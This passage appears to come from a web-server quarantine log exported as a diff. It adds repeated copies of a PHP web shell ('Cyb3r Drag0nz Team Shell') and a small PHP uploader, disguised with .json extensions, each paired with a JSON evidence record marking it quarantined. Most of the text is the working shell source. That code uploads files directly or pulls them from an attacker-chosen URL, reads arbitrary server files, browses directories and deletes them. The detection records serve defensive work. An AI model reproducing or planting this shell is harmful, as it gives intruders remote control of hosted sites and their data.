'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json.evidence.json new file mode 100644 index 0000000..02b29d9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5174", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/ko6h7s5e9kak.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381491, + "size": 10657, + "uid": 20043 + }, + "rel_path": "images/ko6h7s5e9kak.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..2237cf6 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5180", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/temp.f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353232, + "size": 10657, + "uid": 20043 + }, + "rel_path": "images/temp.f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json b/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json.evidence.json new file mode 100644 index 0000000..68a32e3 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5193", + "log_excerpt": "[quarantine] www.archlinexp.eu:images/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346940, + "size": 10657, + "uid": 20043 + }, + "rel_path": "images/yhajxaav.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/joth73.json b/var/www/hosting/archlinexp.eu/www/joth73.json new file mode 100644 index 0000000..f74f3e4 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/joth73.json @@ -0,0 +1,18 @@ +'; +echo ''; +if( $_POST['_upl'] == "Upload" ) { +if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!!

'; } +else { echo 'Fail To Upload File!!!

'; } +} +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/joth73.json.evidence.json b/var/www/hosting/archlinexp.eu/www/joth73.json.evidence.json new file mode 100644 index 0000000..545f47d --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/joth73.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4901", + "log_excerpt": "[quarantine] www.archlinexp.eu:joth73.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/joth73.json)", + "original_sha256": "37153723135d788d7dfa2c8b35a804a39a41c6ad26c4cc263c7e939dc54f1169", + "original_stat": { + "gid": 30037, + "mtime": 1783675097, + "size": 633, + "uid": 20043 + }, + "rel_path": "joth73.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . "
"); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json.evidence.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json.evidence.json new file mode 100644 index 0000000..1c2af82 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4879", + "log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.phar.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381490, + "size": 10657, + "uid": 20043 + }, + "rel_path": "ko6h7s5e9kak.phar.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . "
"); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json.evidence.json new file mode 100644 index 0000000..b957009 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4925", + "log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381486, + "size": 10657, + "uid": 20043 + }, + "rel_path": "ko6h7s5e9kak.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json.evidence.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json.evidence.json new file mode 100644 index 0000000..d182ab9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4905", + "log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381488, + "size": 10657, + "uid": 20043 + }, + "rel_path": "ko6h7s5e9kak.php5.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
